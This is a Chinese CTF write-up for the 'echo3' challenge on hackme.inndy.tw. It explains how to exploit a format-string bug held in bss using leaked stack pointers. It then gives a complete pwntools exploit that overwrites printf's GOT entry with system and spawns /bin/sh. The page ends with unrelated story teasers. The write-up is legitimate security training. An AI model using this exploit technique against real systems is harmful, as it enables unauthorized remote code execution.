echo3

保护很常规,是32位的程序,还是格式化字符串漏洞,但是是存储在bss上的格式化

主程序的alloca函数用来抬栈,而且每次是随机的,所以爆破一下,当泄漏出地址的时候再进行下一步操作

while True:
    #p = process('./echo3',env = {"LD_PRELOAD": "../libc-2.23.so.i386"})
    p = remote('hackme.inndy.tw',7720)
    payload = '%55$p.%14$p'
    p.sendline(payload)
    data = p.recvuntil('.',drop = True)
    if data[-3:] == '637':
        break
    p.close()
__libc_start_main_ret = int(data,16)
stack_base = int(p.recvuntil('\n',drop = True),16) - 0x10
log.success('stack_base : 0x%x ' %stack_base)
offset___libc_start_main_ret = 0x18637
offset_system = 0x0003ad80
printf_got = 0x0804A014
libc_base = __libc_start_main_ret - offset___libc_start_main_ret
system_addr = libc_base + offset_system
log.success('system addr : 0x%x ' %system_addr)

然后将printf_got 改成system地址,由于每次最后改2字节,这里的改写很巧妙(跟M4x师傅学的操作很骚)

1.将栈上两个指针指向栈地址

改写前

这是调用printf函数前的栈结构,我们先将

0xffdd2028│+0x98: 0xffdd210c  →  0xffdd2fd0  →  "LD_PRELOAD=../libc-2.23.so.i386"
0xffdd202c│+0x9c: 0xffdd2104  →  0xffdd2fc8  →  "./echo3"
改写成
0xffdd2028│+0x98: 0xffdd210c  →  0xffdd1fbc  →  0x080485d2  →  <hardfmt+12> add ebx, 0x1a2e
0xffdd202c│+0x9c: 0xffdd2104  →  0xffdd1fdc  →  0x0804877b  →  <main+236> mov eax, 0x0
改写后

2.修改栈上指针为printf_got,printf_got+2

改写前
0xffdd2104│+0x174: 0xffdd1fdc  →  0x0804877b  →  <main+236> mov eax, 0x0
...
0xffdd210c│+0x17c: 0xffdd1fbc  →  0x080485d2  →  <hardfmt+12> add ebx, 0x1a2e

改写成printf_got,printf_got+2

0xffdd2104│+0x174: 0xffdd1fdc  →  0x0804a014  →  0xf7603590  →  <printf+0> call 0xf76d9bc9
...
0xffdd210c│+0x17c: 0xffdd1fbc  →  0x0804a016  →  0x8446f760
改写后

3.最后修改printf_got,printf_got+2的指针为system&0xffff , (system >> 16 ) &0xffff

改写前
0xfff7291c│+0x2c: 0x0804a016  →  0x8446f759
...
0xfff7293c│+0x4c: 0x0804a014  →  0xf759b590  →  <printf+0> call 0xf7671bc9

#printf_got,printf_got+2的指针改写成system&0xffff , (system >> 16 ) &0xffff

0xfff7291c│+0x2c: 0x0804a016  →  0x8446f758
...
0xfff7293c│+0x4c: 0x0804a014  →  0xf758cd80  →  <system+0> sub esp, 0xc
改写后

4.发送/bin/sh,printf('/bin/sh')即system('/bin/sh')

修改成功

可以看到printf_got地址已经修改成system的地址

完整exp:

from pwn import *
import time
context.log_level = 'debug'

while True:
    #p = process('./echo3',env = {"LD_PRELOAD": "../libc-2.23.so.i386"})
    p = remote('hackme.inndy.tw',7720)
    payload = '%55$p.%14$p'
    p.sendline(payload)
    data = p.recvuntil('.',drop = True)
    if data[-3:] == '637':
        break
    p.close()

__libc_start_main_ret = int(data,16)
stack_base = int(p.recvuntil('\n',drop = True),16) - 0x10
log.success('stack_base : 0x%x ' %stack_base)
offset___libc_start_main_ret = 0x18637
offset_system = 0x0003ad80
printf_got = 0x0804A014
libc_base = __libc_start_main_ret - offset___libc_start_main_ret
system_addr = libc_base + offset_system
log.success('system addr : 0x%x ' %system_addr)

sleep(1)

payload = '%' + str( (stack_base + 0x2c) & 0xffff ) + 'c%38$hn'
payload += '%' + str( ((stack_base + 0x4c) & 0xffff) - ((stack_base + 0x2c) & 0xffff)) + 'c%39$hn'
p.sendline(payload)
sleep(1)
#gdb.attach(p)
payload = '%' + str( printf_got & 0xffff) + 'c%93$hn'
payload += '%' + str( ((printf_got+2) & 0xffff) - (printf_got & 0xffff) ) + 'c%95$hn'
p.sendline(payload)
sleep(2)

payload = '%' + str( system_addr & 0xffff ) + 'c%19$hn'
payload += '%' + str( ((system_addr >> 16) & 0xffff) - (system_addr & 0xffff) ) + 'c%11$hn'
#gdb.attach(p)
p.sendline(payload)

p.sendline('/bin/sh')
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,117评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,328评论 1 293
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,839评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,007评论 0 206
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,384评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,629评论 1 219
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,880评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,593评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,313评论 1 243
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,575评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,066评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,392评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,052评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,082评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,844评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,662评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,575评论 2 270

推荐阅读更多精彩内容